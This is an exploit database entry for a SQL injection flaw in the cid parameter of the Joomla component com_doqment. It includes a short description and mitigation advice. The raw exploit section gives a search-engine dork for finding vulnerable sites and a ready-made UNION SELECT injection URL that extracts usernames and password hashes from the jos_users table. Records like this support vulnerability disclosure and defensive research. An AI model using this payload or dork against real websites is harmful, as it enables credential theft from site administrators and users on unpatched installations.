Joomla Component com_doqment (cid) SQL Injection Vulnerability

vendor:

Joomla Component com_doqment

by:

Gamoscu

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Component com_doqment

Affected Version From: Not mentioned

Affected Version To: Not mentioned

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Joomla Component com_doqment (cid) SQL Injection Vulnerability

This vulnerability allows an attacker to execute arbitrary SQL queries in the Joomla component com_doqment by injecting malicious code in the cid parameter. By exploiting this vulnerability, an attacker can access sensitive information from the Joomla database.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Joomla component com_doqment to the latest version. Additionally, input validation and sanitization techniques should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#   Joomla Component com_doqment (cid) SQL Injection Vulnerability          #
#							                    #
#############################################################################


########################################

[~] Author :  Gamoscu
[~] Site   :  www.1923turk.biz
[~] Site   :  www.1923turk.com
[~] Greetz :  Baybora - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
[~] Blog   :  http://gamoscu.wordpress.com/

########################################

[~] DORK: inurl:com_doqment

########################################

[~] Exploit: /index.php?option=com_doqment&cid=[SQL]
[~] Example: /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

########################################